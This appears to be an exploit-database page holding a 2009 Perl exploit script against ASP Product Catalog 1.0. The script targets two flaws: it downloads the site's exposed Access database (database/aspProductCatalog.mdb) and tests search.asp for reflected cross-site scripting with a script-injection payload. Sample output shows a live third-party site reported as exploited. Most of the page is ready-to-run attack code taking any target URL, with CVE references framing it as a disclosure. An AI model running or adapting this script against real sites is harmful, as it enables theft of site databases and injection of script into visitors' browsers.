ASP Product Catalog 1.0 (XSS/DD) Multiple Remote Exploits

2009.04.19
Credit: AlpHaNiX
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-1321 | CVE-2009-1322
CWE: CWE-79
CWE-264

#!/usr/bin/perl # By AlpHaNiX [NullArea.Net] # alpha[at]hacker.bz # Made in Tunisia ########### # script : ASP Product Catalog Multiple Remote Exploits # download : http://sourceforge.net/project/showfiles.php?group_id=136315 # script homepage : http://aspprocatalog.sourceforge.net/ ########### # Vulnerable : # XSS : In Search , # Example : # http://h.1asphost.com/humayuns/aspProductCatalog/search.asp?keywords="><script>alert(1)</script> # Database Disclosure # Path : database/aspProductCatalog.mdb ########## # Real Life Example : XSS # OOO OOO OO OO OO # OO O O O O # O O O OO OO O O O O OO OOO OOOO OOOOO # O O O O O O O OOO OO OOOOOO O # O OO O O O O O O O O OOOOOO # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO # # #[-] ASP Product Catalog Multiple Remote Exploits #[-] Found & Exploited By AlpHaNiX # # #[!] Exploiting http://h.1asphost.com/humayuns/aspProductCatalog// .... #[!] http://h.1asphost.com/humayuns/aspProductCatalog/ Exploited ! #[!] http://h.1asphost.com/humayuns/aspProductCatalog/search.asp?keywords="><script>alert(1)</script> ########## # Real Life Example : Database Disclosure # OOO OOO OO OO OO # OO O O O O # O O O OO OO O O O O OO OOO OOOO OOOOO # O O O O O O O OOO OO OOOOOO O # O OO O O O O O O O O OOOOOO # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO # # #[-] ASP Product Catalog Multiple Remote Exploits #[-] Found & Exploited By AlpHaNiX # # #[!] Exploiting http://h.1asphost.com/humayuns/aspProductCatalog// .... #[!] http://h.1asphost.com/humayuns/aspProductCatalog/ Exploited ! database saved to c:/db.mdb ########## # Greetz for Zigma/Djek/unary/r1z use lwp::UserAgent; system('cls'); system('title ASP Product Catalog Multiple Remote Exploits'); system('color 2'); if (!defined($ARGV[0] && $ARGV[1])) {print "[!] Usage : \n ./exploit http://site.com -DD\n ./exploit http://site.com -XSS\n";exit();} if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } my @array; print "\n\n\n\n OOO OOO OO OO OO\n" ; print " OO O O O O\n" ; print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ; print " O O O O O O O OOO OO OOOOOO O\n" ; print " O OO O O O O O O O O OOOOOO\n" ; print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ; print "\n\n[-] ASP Product Catalog Multiple Remote Exploits\n"; print "[-] Found & Exploited By AlpHaNiX \n\n\n"; print "[!] Exploiting $site ....\n"; my $bug = $ARGV[1] ; my $site = $ARGV[0] ; my $targetdd = $site."database/aspProductCatalog.mdb" ; if ($bug eq '-DD') { my $useragent = LWP::UserAgent->new(agent => "Mozilla 5.5"); my $request = $useragent->get($targetdd,":content_file" => "c:/db.mdb"); if ($request->is_success) { print "[!] $site Exploited ! database saved to c:/db.mdb\n"; } else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} } elsif ($bug eq '-XSS') { my $useragent = LWP::UserAgent->new(agent => "Mozilla 5.5"); my $request = $useragent->get("$site"."search.asp?keywords=ALPHANIXNULLAREA"); if ($request->is_success) { if ($request->content =~ m/ALPHANIXNULLAREA/i){print "[!] $site Exploited !\n[!] $site"."search.asp?keywords=\"><script>alert(1)<\/script>\n";} else {print "[!] Exploiting $site Failed !\n";} } else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} } else { print "[!] Please Choose a valid flag -DD for database disclosure & -XSS For Cross Site Scripting\n"; exit(); }

References:

http://xforce.iss.net/xforce/xfdb/49858
http://www.securityfocus.com/bid/34504
http://www.milw0rm.com/exploits/8418


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top